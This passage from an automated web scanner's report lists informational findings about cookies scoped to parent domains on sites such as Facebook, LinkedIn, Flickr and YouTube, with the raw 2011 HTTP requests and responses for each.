GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wLXVp; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:25 GMT
Content-Length: 0


12.101. http://www.facebook.com/pages/Veoh/129836657035793  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Veoh/129836657035793

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Veoh/129836657035793 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/VeohTV
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=FMAWt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 0


12.102. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:39 GMT
Content-Length: 10796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.103. http://www.facebook.com/supermediacom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /supermediacom

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supermediacom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:37 GMT
Content-Length: 146681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.104. http://www.flickr.com/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /search/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:30 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com
X-Served-By: www87.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Search</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta n
...[SNIP]...

12.105. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wholesale-Shower-Faucets_c2863 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:45 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJclZoSofA3ibAg==; expires=Fri, 03-Feb-12 22:01:45 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s6; path=/
Cache-control: private
Content-Length: 154109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...

12.106. http://www.linkchina.com/wholesale/golf-clubs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkchina.com
Path:   /wholesale/golf-clubs.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wholesale/golf-clubs.html HTTP/1.1
Host: www.linkchina.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.14
Date: Thu, 03 Feb 2011 22:01:50 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: JBoss
Set-Cookie: JSESSIONID=D44E47A48566C6E25242FFA27CBCB248; Path=/
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Set-Cookie: LinkChinaCookie=SellerLinkChinaSession_D44E47A48566C6E25242FFA27CBCB248; Domain=.linkchina.com
Content-Length: 95252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv=
...[SNIP]...

12.107. http://www.linkedin.com/in/troyd/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /in/troyd/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /in/troyd/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/
Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT
If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:25:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...

12.108. http://www.linkedin.com/pub/troy-brown/07/287/56A/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /pub/troy-brown/07/287/56A/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pub/troy-brown/07/287/56A/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:6393265550819748814"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8umv_nS7XFzUyxeKwcm4-54LG5Af_dxZBECJyfS9zSz2oe7lnSRZnR:1296764778:7cadffe11cc6d886b438c64892ac7c2f8d826bc7"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 20:56:17 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: bcookie="v=1&b190bc23-5ec6-4de1-a9c4-5a80edfac251"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/troy-brown/7/287/56a
Content-Language: en-US
Content-Length: 0
Date: Thu, 03 Feb 2011 20:26:18 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive


12.109. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 7453
Date: Thu, 03 Feb 2011 19:20:54 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly

<!DOCTYPE html>
<html lang="en">
<head>


<title>LinkedIn Sign In | LinkedIn</title>

...[SNIP]...

12.110. http://www.made-in-china.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.made-in-china.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:28:13 GMT
Server: Apache
Cache-Control: private
Set-Cookie: sf_img=AM; domain=.made-in-china.com; path=/; expires=Fri, 03-Feb-2012 20:28:13 GMT
Set-Cookie: cid=jAxMTAyMDQwNDI4MTM4NjMwMDA6MDE3MTM0NDI4NzEyMzU4MTU1MTEM; domain=.made-in-china.com; path=/
Set-Cookie: sid=TE5OTQ5MTE5NTgzMjI5MzoxNzMuMTkzLjIxNC4yNDMO; domain=.made-in-china.com; path=/
Set-Cookie: JSESSIONID=aYL_X1GnJqlf; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=GBK
Content-Length: 98587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="
...[SNIP]...

12.111. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.msn.com
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:29:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~126II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.msn.com; expires=Mon, 07-Feb-2011 02:29:37 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=msn.com; expires=Fri, 18-Feb-2011 02:29:37 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 80938
Content-Length: 80938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...

12.112. http://www.mybloglog.com/buzz/members/smartdesis/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybloglog.com
Path:   /buzz/members/smartdesis/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /buzz/members/smartdesis/x22 HTTP/1.1
Host: www.mybloglog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:28:24 GMT
Set-Cookie: BX=9fhlkdh6km3v8&b=3&s=1o; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 7249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Page Not Found - MyBlogLog</title>
<meta http-equiv="Cont
...[SNIP]...

12.113. http://www.switchboard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.switchboard.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.switchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=2FABF569B30B4B4450F39F4DAF303551; Path=/
Set-Cookie: SWBD=1296761727329-www.switchboard.com-9308380-589736ZZ; Domain=.switchboard.com; Expires=Tue, 02-Feb-2016 19:35:27 GMT; Path=/
Set-Cookie: SWBD=1296761727329-www.switchboard.com-9308380-631301ZZ; Domain=.switchboard.com; Expires=Tue, 02-Feb-2016 19:35:27 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 14856
Date: Thu, 03 Feb 2011 19:35:27 GMT
Connection: close
Set-Cookie: NSC_xxx-txjudicpbse-dpn-80-VOJY=ffffffff948202af45525d5f4f58455e445a4a421502;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

12.114. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

12.115. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

12.116. http://www.wix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wix.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: 1-2-HP=1172830883; Domain=wix.com; Expires=Sat, 05-Feb-2011 05:59:59 GMT; Path=/
Set-Cookie: userType=ANONYMOUS; Domain=.wix.com; Expires=Thu, 04-Feb-2016 01:34:40 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixRefX=null-referer; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixCampX=null-campaign; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCampX=null-campaign; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixExprX=null-expr; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixExprX=null-expr; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixLndX=6457463; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixTSX=1296765050363; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixTSX=1296765050363; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixUIDX=null-user-id; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Set-Cookie: _wixCIDX=8e188904-2fa4-4f45-a7ad-f97f9710f96f; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wixCIDX=8e188904-2fa4-4f45-a7ad-f97f9710f96f; Domain=.wix.com; Expires=Tue, 02-Aug-2011 20:30:50 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...

12.117. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=FZaZ02S4c3g; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:02 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:02 GMT
